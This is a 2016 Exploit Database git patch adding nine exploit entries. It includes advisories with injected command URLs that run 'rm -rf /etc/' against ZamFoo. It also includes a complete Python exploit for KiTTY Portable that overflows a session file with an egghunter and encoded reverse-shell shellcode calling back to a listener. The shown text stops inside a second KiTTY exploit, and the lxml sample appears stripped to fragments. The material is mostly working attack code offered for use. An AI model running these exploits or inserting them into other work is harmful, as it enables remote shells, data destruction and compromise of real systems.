From 5aeeaef0a2a88ad8dcf8c5a4f226c09c56b1b676 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 4 Jan 2016 05:02:55 +0000 Subject: [PATCH] DB: 2016-01-04 9 new exploits --- files.csv | 12 +- platforms/cgi/webapps/39156.txt | 13 + platforms/hardware/remote/39154.txt | 9 + platforms/linux/remote/39155.txt | 47 ++++ platforms/php/webapps/39153.txt | 9 + platforms/php/webapps/39157.txt | 7 + platforms/windows/local/39120.py | 412 ++++++++++++++++++++++++++++ platforms/windows/local/39121.py | 304 ++++++++++++++++++++ platforms/windows/local/39122.py | 263 ++++++++++++++++++ platforms/windows/remote/39119.py | 341 +++++++++++++++++++++++ 10 files changed, 1414 insertions(+), 3 deletions(-) create mode 100755 platforms/cgi/webapps/39156.txt create mode 100755 platforms/hardware/remote/39154.txt create mode 100755 platforms/linux/remote/39155.txt create mode 100755 platforms/php/webapps/39153.txt create mode 100755 platforms/php/webapps/39157.txt create mode 100755 platforms/windows/local/39120.py create mode 100755 platforms/windows/local/39121.py create mode 100755 platforms/windows/local/39122.py create mode 100755 platforms/windows/remote/39119.py diff --git a/files.csv b/files.csv index 253b6fcc7..2f33cc2fc 100755 --- a/files.csv +++ b/files.csv @@ -35372,9 +35372,10 @@ id,file,description,date,author,platform,type,port 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0 -39119,platforms/windows/remote/39119..py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 -39120,platforms/windows/local/39120..py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 -39122,platforms/windows/local/39122..py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 +39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 +39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 +39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 +39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include Vulnerability",2014-03-10,Dr.3v1l,php,webapps,0 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service Vulnerability",2014-03-20,CXsecurity,windows,dos,0 39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0 @@ -35400,3 +35401,8 @@ id,file,description,date,author,platform,type,port 39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0 39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 39152,platforms/linux/shellcode/39152..c,"tcp bindshell with password prompt in 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0 +39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0 +39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 +39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0 +39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0 +39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0 diff --git a/platforms/cgi/webapps/39156.txt b/platforms/cgi/webapps/39156.txt new file mode 100755 index 000000000..dc7b72cbe --- /dev/null +++ b/platforms/cgi/webapps/39156.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/67215/info + +ZamFoo is prone to multiple remote command-execution vulnerabilities. + +Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer. + +ZamFoo 12.6 is vulnerable; other versions may also be affected. + +https://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS} + +https://www.example.com/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2= + + diff --git a/platforms/hardware/remote/39154.txt b/platforms/hardware/remote/39154.txt new file mode 100755 index 000000000..ba96bf036 --- /dev/null +++ b/platforms/hardware/remote/39154.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/67033/info + +Comtrend CT-5361T ADSL Router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability. + +An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible. + +Comtrend CT-5361T firmware version A111-312SSG-T02_R01 is vulnerable; other versions may also be affected. + +http://www.example.com/password.cgi?sysPassword=[Your Password] \ No newline at end of file diff --git a/platforms/linux/remote/39155.txt b/platforms/linux/remote/39155.txt new file mode 100755 index 000000000..ff5b43d7b --- /dev/null +++ b/platforms/linux/remote/39155.txt @@ -0,0 +1,47 @@ +source: http://www.securityfocus.com/bid/67159/info + +lxml is prone to a security-bypass vulnerability. + +An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. + +Versions prior to lxml 3.3.5 are vulnerable. + +from lxml.html.clean import clean_html + +html = '''\ + + + +aaa +bbb +bbb +bbb +bbb +bbb +bbb +bbb +bbb +bbb + +''' + +print clean_html(html) + + +Output: + +
+ +aaa + +bbb +bbb +bbb +bbb +bbb +bbb +bbb +bbb +bbb + +
diff --git a/platforms/php/webapps/39153.txt b/platforms/php/webapps/39153.txt new file mode 100755 index 000000000..2c59f44b1 --- /dev/null +++ b/platforms/php/webapps/39153.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/67031/info + +iDevAffiliate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +iDevAffiliate 5.0 and prior are vulnerable. + +http://www.example.com/idevaffiliate/idevads.php?id=6&ad=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/39157.txt b/platforms/php/webapps/39157.txt new file mode 100755 index 000000000..b5ea3a46c --- /dev/null +++ b/platforms/php/webapps/39157.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/67241/info + +Puntopy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/novedad.php?id=[SQL Injection] \ No newline at end of file diff --git a/platforms/windows/local/39120.py b/platforms/windows/local/39120.py new file mode 100755 index 000000000..8a3e9a2b0 --- /dev/null +++ b/platforms/windows/local/39120.py @@ -0,0 +1,412 @@ +# Exploit Title: KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP, DoS 7/8.1/10) +# Date: 28/12/2015 +# Exploit Author: Guillaume Kaddouch +# Twitter: @gkweb76 +# Blog: http://networkfilter.blogspot.com +# GitHub: https://github.com/gkweb76/exploits +# Vendor Homepage: http://www.9bis.net/kitty/ +# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe +# Version: 0.65.0.2p +# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR) +# Category: Local + + +""" +Disclosure Timeline: +-------------------- +2015-09-13: Vulnerability discovered +2015-09-26: Vendor contacted +2015-09-28: Vendor answer +2015-10-09: KiTTY 0.65.0.3p released, still vulnerable +2015-10-20: KiTTY 0.65.1.1p released, still vulnerable +2015-11-15: KiTTY 0.66.6.1p released, seems fixed +2015-12-28: exploit published + +Description : +------------- +A local overflow exists in the session file used by KiTTY portable, in the HostName parameter. It is possible to write +an overly long string to trigger an overflow. It can be used to trigger code execution on Windows XP SP3, or to crash +the program from Windows 7 to Windows 10. It has been tested with KiTTY portable 0.65.0.2p/0.65.0.3p/0.65.1.1p, but earlier versions are +likely to be vulnerable too. + +WinXP -> Local Code Execution +Win7 -> Denial Of Service +Win8.1 -> Denial Of Service +Win10 -> Denial Of Service + +Instructions: +------------- +- Run exploit +- Launch KiTTY, select "EvilSession" on the session list, then click "Load". + +Exploitation: +------------- +When writing a 1500 bytes string to the HostName parameter in a session file, EIP is overwritten at offset 1232. +As ESP points to our buffer, we use an address doing a JMP ESP in an unprotected DLL. However, as the memory area +we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required. The final +shellcode is written into another session parameter, LogFileName. After successful exploitation, a reverse shell +is given if this payload has been selected on Windows XP SP3 (on Windows 7/8.1/10, KiTTY crashes): + +guillaume@kali64:~/tools$ nc -nlvp 4444 +listening on [any] 4444 ... +connect to [192.168.135.131] from (UNKNOWN) [192.168.135.130] 1955 +Microsoft Windows XP [version 5.1.2600] +(C) Copyright 1985-2001 Microsoft Corp. + +C:\kitty\App\KiTTY> + +""" + +egg = "w00t" # \x77\x30\x30\x74 + +# Windows NtAccessCheckAndAuditAlarm EggHunter +# Size: 32 bytes +egghunter = ( +"\x66\x81\xca\xff\x0f" # or dx,0x0fff +"\x42" # inc edx +"\x52" # push edx +"\x6a\x02" # push byte +0x02 +"\x58" # pop eax +"\xcd\x2e" # int 0x2e +"\x3c\x05" # cmp al,0x5 +"\x5a" # pop edx +"\x74\xef" # jz 0x0 +"\xb8\x77\x30\x30\x74" # mov eax,0x74303077 ; egg +"\x8b\xfa" # mov edi,edx +"\xaf" # scasd +"\x75\xea" # jnz 0x5 +"\xaf" # scasd +"\x75\xe7" # jnz 0x5 +"\xff\xe7" # jmp edi +) + +# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want) +# Encoder: x86/shikata_ga_nai +# Bad chars: '\x00\x0a\x0d\x5c' +# Size: 351 bytes +shellcode = ( +"\xb8\xa9\xbf\xda\xcb\xdd\xc0\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" +"\x52\x83\xee\xfc\x31\x46\x0e\x03\xef\xb1\x38\x3e\x13\x25\x3e" +"\xc1\xeb\xb6\x5f\x4b\x0e\x87\x5f\x2f\x5b\xb8\x6f\x3b\x09\x35" +"\x1b\x69\xb9\xce\x69\xa6\xce\x67\xc7\x90\xe1\x78\x74\xe0\x60" +"\xfb\x87\x35\x42\xc2\x47\x48\x83\x03\xb5\xa1\xd1\xdc\xb1\x14" +"\xc5\x69\x8f\xa4\x6e\x21\x01\xad\x93\xf2\x20\x9c\x02\x88\x7a" +"\x3e\xa5\x5d\xf7\x77\xbd\x82\x32\xc1\x36\x70\xc8\xd0\x9e\x48" +"\x31\x7e\xdf\x64\xc0\x7e\x18\x42\x3b\xf5\x50\xb0\xc6\x0e\xa7" +"\xca\x1c\x9a\x33\x6c\xd6\x3c\x9f\x8c\x3b\xda\x54\x82\xf0\xa8" +"\x32\x87\x07\x7c\x49\xb3\x8c\x83\x9d\x35\xd6\xa7\x39\x1d\x8c" +"\xc6\x18\xfb\x63\xf6\x7a\xa4\xdc\x52\xf1\x49\x08\xef\x58\x06" +"\xfd\xc2\x62\xd6\x69\x54\x11\xe4\x36\xce\xbd\x44\xbe\xc8\x3a" +"\xaa\x95\xad\xd4\x55\x16\xce\xfd\x91\x42\x9e\x95\x30\xeb\x75" +"\x65\xbc\x3e\xd9\x35\x12\x91\x9a\xe5\xd2\x41\x73\xef\xdc\xbe" +"\x63\x10\x37\xd7\x0e\xeb\xd0\x18\x66\x74\xa3\xf1\x75\x7a\xb5" +"\x5d\xf3\x9c\xdf\x4d\x55\x37\x48\xf7\xfc\xc3\xe9\xf8\x2a\xae" +"\x2a\x72\xd9\x4f\xe4\x73\x94\x43\x91\x73\xe3\x39\x34\x8b\xd9" +"\x55\xda\x1e\x86\xa5\x95\x02\x11\xf2\xf2\xf5\x68\x96\xee\xac" +"\xc2\x84\xf2\x29\x2c\x0c\x29\x8a\xb3\x8d\xbc\xb6\x97\x9d\x78" +"\x36\x9c\xc9\xd4\x61\x4a\xa7\x92\xdb\x3c\x11\x4d\xb7\x96\xf5" +"\x08\xfb\x28\x83\x14\xd6\xde\x6b\xa4\x8f\xa6\x94\x09\x58\x2f" +"\xed\x77\xf8\xd0\x24\x3c\x08\x9b\x64\x15\x81\x42\xfd\x27\xcc" +"\x74\x28\x6b\xe9\xf6\xd8\x14\x0e\xe6\xa9\x11\x4a\xa0\x42\x68" +"\xc3\x45\x64\xdf\xe4\x4f" +) + +junk = '\x41' * 1232 +ret = '\x7B\x46\x86\x7C' # 0x7C86467B / jmp esp / kernel32.dll +nops = '\x90' * 8 +eggmark = egg * 2 +padding = '\x42' * (1500 - len(junk) - len(ret) - len(egghunter)) + +payload1 = junk + ret + egghunter + padding # Egg Hunter +payload2 = eggmark + nops + shellcode # Final Shellcode + +# A whole KiTTY session file, written to \Sessions\EvilSession" +buffer = "PortKnocking\\\\\r" +buffer += "ACSinUTF\\0\\\r" +buffer += "Comment\\\\\r" +buffer += "CtrlTabSwitch\\0\\\r" +buffer += "Password\\1350b\\\r" +buffer += "ForegroundOnBell\\0\\\r" +buffer += "SaveWindowPos\\0\\\r" +buffer += "WindowState\\0\\\r" +buffer += "TermYPos\\-1\\\r" +buffer += "TermXPos\\-1\\\r" +buffer += "LogTimeRotation\\0\\\r" +buffer += "Folder\\Default\\\r" +buffer += "AutocommandOut\\\\\r" +buffer += "Autocommand\\\\\r" +buffer += "LogTimestamp\\\\\r" +buffer += "AntiIdle\\\\\r" +buffer += "ScriptfileContent\\\\\r" +buffer += "Scriptfile\\\\\r" +buffer += "SFTPConnect\\\\\r" +buffer += "IconeFile\\\\\r" +buffer += "Icone\\1\\\r" +buffer += "SaveOnExit\\0\\\r" +buffer += "Fullscreen\\0\\\r" +buffer += "Maximize\\0\\\r" +buffer += "SendToTray\\0\\\r" +buffer += "TransparencyValue\\0\\\r" +buffer += "zDownloadDir\\C%3A%5C\\\r" +buffer += "szOptions\\-e%20-v\\\r" +buffer += "szCommand\\\\\r" +buffer += "rzOptions\\-e%20-v\\\r" +buffer += "rzCommand\\\\\r" +buffer += "CygtermCommand\\\\\r" +buffer += "Cygterm64\\0\\\r" +buffer += "CygtermAutoPath\\1\\\r" +buffer += "CygtermAltMetabit\\0\\\r" +buffer += "HyperlinkRegularExpression\\(((https%3F%7Cftp)%3A%5C%2F%5C%2F)%7Cwww%5C.)(([0-9]+%5C.[0-9]+%5C.[0-9]+%5C.[0-9]+)%7Clocalhost%7C([a-zA-Z0-9%5C-]+%5C.)%2A[a-zA-Z0-9%5C-]+%5C.(com%7Cnet%7Corg%7Cinfo%7Cbiz%7Cgov%7Cname%7Cedu%7C[a-zA-Z][a-zA-Z]))(%3A[0-9]+)%3F((%5C%2F%7C%5C%3F)[^%20%22]%2A[^%20,;%5C.%3A%22%3E)])%3F\\\r" +buffer += "HyperlinkRegularExpressionUseDefault\\1\\\r" +buffer += "HyperlinkBrowser\\\\\r" +buffer += "HyperlinkBrowserUseDefault\\1\\\r" +buffer += "HyperlinkUseCtrlClick\\1\\\r" +buffer += "HyperlinkUnderline\\0\\\r" +buffer += "FailureReconnect\\0\\\r" +buffer += "WakeupReconnect\\0\\\r" +buffer += "SSHManualHostKeys\\\\\r" +buffer += "ConnectionSharingDownstream\\1\\\r" +buffer += "ConnectionSharingUpstream\\1\\\r" +buffer += "ConnectionSharing\\0\\\r" +buffer += "WindowClass\\\\\r" +buffer += "SerialFlowControl\\1\\\r" +buffer += "SerialParity\\0\\\r" +buffer += "SerialStopHalfbits\\2\\\r" +buffer += "SerialDataBits\\8\\\r" +buffer += "SerialSpeed\\9600\\\r" +buffer += "SerialLine\\COM1\\\r" +buffer += "ShadowBoldOffset\\1\\\r" +buffer += "ShadowBold\\0\\\r" +buffer += "WideBoldFontHeight\\0\\\r" +buffer += "WideBoldFontCharSet\\0\\\r" +buffer += "WideBoldFontIsBold\\0\\\r" +buffer += "WideBoldFont\\\\\r" +buffer += "WideFontHeight\\0\\\r" +buffer += "WideFontCharSet\\0\\\r" +buffer += "WideFontIsBold\\0\\\r" +buffer += "WideFont\\\\\r" +buffer += "BoldFontHeight\\0\\\r" +buffer += "BoldFontCharSet\\0\\\r" +buffer += "BoldFontIsBold\\0\\\r" +buffer += "BoldFont\\\\\r" +buffer += "ScrollbarOnLeft\\0\\\r" +buffer += "LoginShell\\1\\\r" +buffer += "StampUtmp\\1\\\r" +buffer += "BugChanReq\\0\\\r" +buffer += "BugWinadj\\0\\\r" +buffer += "BugOldGex2\\0\\\r" +buffer += "BugMaxPkt2\\0\\\r" +buffer += "BugRekey2\\0\\\r" +buffer += "BugPKSessID2\\0\\\r" +buffer += "BugRSAPad2\\0\\\r" +buffer += "BugDeriveKey2\\0\\\r" +buffer += "BugHMAC2\\0\\\r" +buffer += "BugIgnore2\\0\\\r" +buffer += "BugRSA1\\0\\\r" +buffer += "BugPlainPW1\\0\\\r" +buffer += "BugIgnore1\\0\\\r" +buffer += "PortForwardings\\\\\r" +buffer += "RemotePortAcceptAll\\0\\\r" +buffer += "LocalPortAcceptAll\\0\\\r" +buffer += "X11AuthFile\\\\\r" +buffer += "X11AuthType\\1\\\r" +buffer += "X11Display\\\\\r" +buffer += "X11Forward\\0\\\r" +buffer += "BlinkText\\0\\\r" +buffer += "BCE\\1\\\r" +buffer += "LockSize\\0\\\r" +buffer += "EraseToScrollback\\1\\\r" +buffer += "ScrollOnDisp\\1\\\r" +buffer += "ScrollOnKey\\0\\\r" +buffer += "ScrollBarFullScreen\\0\\\r" +buffer += "ScrollBar\\1\\\r" +buffer += "CapsLockCyr\\0\\\r" +buffer += "Printer\\\\\r" +buffer += "UTF8Override\\1\\\r" +buffer += "CJKAmbigWide\\0\\\r" +buffer += "LineCodePage\\\\\r" +buffer += "Wordness224\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r" +buffer += "Wordness192\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r" +buffer += "Wordness160\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r" +buffer += "Wordness128\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r" +buffer += "Wordness96\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1\\\r" +buffer += "Wordness64\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2\\\r" +buffer += "Wordness32\\0,1,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1\\\r" +buffer += "Wordness0\\0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\\\r" +buffer += "MouseOverride\\1\\\r" +buffer += "RectSelect\\0\\\r" +buffer += "MouseIsXterm\\0\\\r" +buffer += "PasteRTF\\0\\\r" +buffer += "RawCNP\\0\\\r" +buffer += "Colour33\\187,187,187\\\r" +buffer += "Colour32\\0,0,0\\\r" +buffer += "Colour31\\187,187,187\\\r" +buffer += "Colour30\\0,187,187\\\r" +buffer += "Colour29\\187,0,187\\\r" +buffer += "Colour28\\0,0,187\\\r" +buffer += "Colour27\\187,187,0\\\r" +buffer += "Colour26\\0,187,0\\\r" +buffer += "Colour25\\187,0,0\\\r" +buffer += "Colour24\\0,0,0\\\r" +buffer += "Colour23\\0,0,0\\\r" +buffer += "Colour22\\187,187,187\\\r" +buffer += "Colour21\\255,255,255\\\r" +buffer += "Colour20\\187,187,187\\\r" +buffer += "Colour19\\85,255,255\\\r" +buffer += "Colour18\\0,187,187\\\r" +buffer += "Colour17\\255,85,255\\\r" +buffer += "Colour16\\187,0,187\\\r" +buffer += "Colour15\\85,85,255\\\r" +buffer += "Colour14\\0,0,187\\\r" +buffer += "Colour13\\255,255,85\\\r" +buffer += "Colour12\\187,187,0\\\r" +buffer += "Colour11\\85,255,85\\\r" +buffer += "Colour10\\0,187,0\\\r" +buffer += "Colour9\\255,85,85\\\r" +buffer += "Colour8\\187,0,0\\\r" +buffer += "Colour7\\85,85,85\\\r" +buffer += "Colour6\\0,0,0\\\r" +buffer += "Colour5\\0,255,0\\\r" +buffer += "Colour4\\0,0,0\\\r" +buffer += "Colour3\\85,85,85\\\r" +buffer += "Colour2\\0,0,0\\\r" +buffer += "Colour1\\255,255,255\\\r" +buffer += "Colour0\\187,187,187\\\r" +buffer += "SelectedAsColour\\0\\\r" +buffer += "UnderlinedAsColour\\0\\\r" +buffer += "BoldAsColourTest\\1\\\r" +buffer += "DisableBottomButtons\\1\\\r" +buffer += "WindowHasSysMenu\\1\\\r" +buffer += "WindowMaximizable\\1\\\r" +buffer += "WindowMinimizable\\1\\\r" +buffer += "WindowClosable\\1\\\r" +buffer += "BoldAsColour\\1\\\r" +buffer += "Xterm256Colour\\1\\\r" +buffer += "ANSIColour\\1\\\r" +buffer += "TryPalette\\0\\\r" +buffer += "UseSystemColours\\0\\\r" +buffer += "FontVTMode\\4\\\r" +buffer += "FontQuality\\0\\\r" +buffer += "FontHeight\\10\\\r" +buffer += "FontCharSet\\0\\\r" +buffer += "FontIsBold\\0\\\r" +buffer += "Font\\Courier%20New\\\r" +buffer += "TermHeight\\24\\\r" +buffer += "TermWidth\\80\\\r" +buffer += "WinTitle\\\\\r" +buffer += "WinNameAlways\\1\\\r" +buffer += "DisableBidi\\0\\\r" +buffer += "DisableArabicShaping\\0\\\r" +buffer += "CRImpliesLF\\0\\\r" +buffer += "LFImpliesCR\\0\\\r" +buffer += "AutoWrapMode\\1\\\r" +buffer += "DECOriginMode\\0\\\r" +buffer += "ScrollbackLines\\10000\\\r" +buffer += "BellOverloadS\\5000\\\r" +buffer += "BellOverloadT\\2000\\\r" +buffer += "BellOverloadN\\5\\\r" +buffer += "BellOverload\\1\\\r" +buffer += "BellWaveFile\\\\\r" +buffer += "BeepInd\\0\\\r" +buffer += "Beep\\1\\\r" +buffer += "BlinkCur\\0\\\r" +buffer += "CurType\\0\\\r" +buffer += "WindowBorder\\1\\\r" +buffer += "SunkenEdge\\0\\\r" +buffer += "HideMousePtr\\0\\\r" +buffer += "FullScreenOnAltEnter\\0\\\r" +buffer += "AlwaysOnTop\\0\\\r" +buffer += "Answerback\\KiTTY\\\r" +buffer += "LocalEdit\\2\\\r" +buffer += "LocalEcho\\2\\\r" +buffer += "TelnetRet\\1\\\r" +buffer += "TelnetKey\\0\\\r" +buffer += "CtrlAltKeys\\1\\\r" +buffer += "ComposeKey\\0\\\r" +buffer += "AltOnly\\0\\\r" +buffer += "AltSpace\\0\\\r" +buffer += "AltF4\\1\\\r" +buffer += "NetHackKeypad\\0\\\r" +buffer += "ApplicationKeypad\\0\\\r" +buffer += "ApplicationCursorKeys\\0\\\r" +buffer += "NoRemoteCharset\\0\\\r" +buffer += "NoDBackspace\\0\\\r" +buffer += "RemoteQTitleAction\\1\\\r" +buffer += "NoRemoteWinTitle\\0\\\r" +buffer += "NoAltScreen\\0\\\r" +buffer += "NoRemoteResize\\0\\\r" +buffer += "NoMouseReporting\\0\\\r" +buffer += "NoApplicationCursors\\0\\\r" +buffer += "NoApplicationKeys\\0\\\r" +buffer += "LinuxFunctionKeys\\0\\\r" +buffer += "RXVTHomeEnd\\0\\\r" +buffer += "BackspaceIsDelete\\1\\\r" +buffer += "PassiveTelnet\\0\\\r" +buffer += "RFCEnviron\\0\\\r" +buffer += "RemoteCommand\\\\\r" +buffer += "PublicKeyFile\\\\\r" +buffer += "SSH2DES\\0\\\r" +buffer += "SshProt\\3\\\r" +buffer += "SshNoShell\\0\\\r" +buffer += "GSSCustom\\\\\r" +buffer += "GSSLibs\\gssapi32,sspi,custom\\\r" +buffer += "AuthGSSAPI\\1\\\r" +buffer += "AuthKI\\1\\\r" +buffer += "AuthTIS\\0\\\r" +buffer += "SshBanner\\1\\\r" +buffer += "SshNoAuth\\0\\\r" +buffer += "RekeyBytes\\1G\\\r" +buffer += "RekeyTime\\60\\\r" +buffer += "KEX\\dh-gex-sha1,dh-group14-sha1,dh-group1-sha1,rsa,WARN\\\r" +buffer += "Cipher\\aes,blowfish,3des,WARN,arcfour,des\\\r" +buffer += "ChangeUsername\\0\\\r" +buffer += "GssapiFwd\\0\\\r" +buffer += "AgentFwd\\0\\\r" +buffer += "TryAgent\\1\\\r" +buffer += "Compression\\0\\\r" +buffer += "NoPTY\\0\\\r" +buffer += "LocalUserName\\\\\r" +buffer += "UserNameFromEnvironment\\0\\\r" +buffer += "UserName\\\\\r" +buffer += "Environment\\\\\r" +buffer += "ProxyTelnetCommand\\connect%20%25host%20%25port%5Cn\\\r" +buffer += "ProxyPassword\\\\\r" +buffer += "ProxyUsername\\\\\r" +buffer += "ProxyPort\\80\\\r" +buffer += "ProxyHost\\proxy\\\r" +buffer += "ProxyMethod\\0\\\r" +buffer += "ProxyLocalhost\\0\\\r" +buffer += "ProxyDNS\\1\\\r" +buffer += "ProxyExcludeList\\\\\r" +buffer += "AddressFamily\\0\\\r" +buffer += "TerminalModes\\CS7=A,CS8=A,DISCARD=A,DSUSP=A,ECHO=A,ECHOCTL=A,ECHOE=A,ECHOK=A,ECHOKE=A,ECHONL=A,EOF=A,EOL=A,EOL2=A,ERASE=A,FLUSH=A,ICANON=A,ICRNL=A,IEXTEN=A,IGNCR=A,IGNPAR=A,IMAXBEL=A,INLCR=A,INPCK=A,INTR=A,ISIG=A,ISTRIP=A,IUCLC=A,IXANY=A,IXOFF=A,IXON=A,KILL=A,LNEXT=A,NOFLSH=A,OCRNL=A,OLCUC=A,ONLCR=A,ONLRET=A,ONOCR=A,OPOST=A,PARENB=A,PARMRK=A,PARODD=A,PENDIN=A,QUIT=A,REPRINT=A,START=A,STATUS=A,STOP=A,SUSP=A,SWTCH=A,TOSTOP=A,WERASE=A,XCASE=A\\\r" +buffer += "TerminalSpeed\\38400,38400\\\r" +buffer += "TerminalType\\xterm\\\r" +buffer += "TCPKeepalives\\0\\\r" +buffer += "TCPNoDelay\\1\\\r" +buffer += "PingIntervalSecs\\0\\\r" +buffer += "PingInterval\\0\\\r" +buffer += "WarnOnClose\\1\\\r" +buffer += "CloseOnExit\\1\\\r" +buffer += "PortNumber\\22\\\r" +buffer += "Protocol\\ssh\\\r" +buffer += "SSHLogOmitData\\0\\\r" +buffer += "SSHLogOmitPasswords\\1\\\r" +buffer += "LogFlush\\1\\\r" +buffer += "LogFileClash\\-1\\\r" +buffer += "LogType\\0\\\r" +buffer += "LogFileName\\" + payload2 + "\\\r" # Shellcode +buffer += "HostName\\" + payload1 + "\\\r" # Egg Hunter +buffer += "Present\\1\\\r" +buffer += "LogHost\\\\\r" + +# Location of our evil session file (modify with your KiTTY directory) +file = "C:\\kitty\\App\\KiTTY\\Sessions\\EvilSession" +try: + print "\n[*] Writing to %s (%s bytes)" % (file, len(buffer)) + f = open(file,'w') + f.write(buffer) + f.close() + print "[*] Done!" +except: + print "[-] Error writing %s" % file \ No newline at end of file diff --git a/platforms/windows/local/39121.py b/platforms/windows/local/39121.py new file mode 100755 index 000000000..cdcd026c8 --- /dev/null +++ b/platforms/windows/local/39121.py @@ -0,0 +1,304 @@ +# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7) +# Date: 28/12/2015 +# Exploit Author: Guillaume Kaddouch +# Twitter: @gkweb76 +# Blog: http://networkfilter.blogspot.com +# GitHub: https://github.com/gkweb76/exploits +# Vendor Homepage: http://www.9bis.net/kitty/ +# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe +# Version: 0.65.0.2p +# Tested on: Windows 7 Pro x64 (FR) +# Category: Local + +""" +Disclosure Timeline: +-------------------- +2015-09-18: Vulnerability discovered +2015-09-26: Vendor contacted 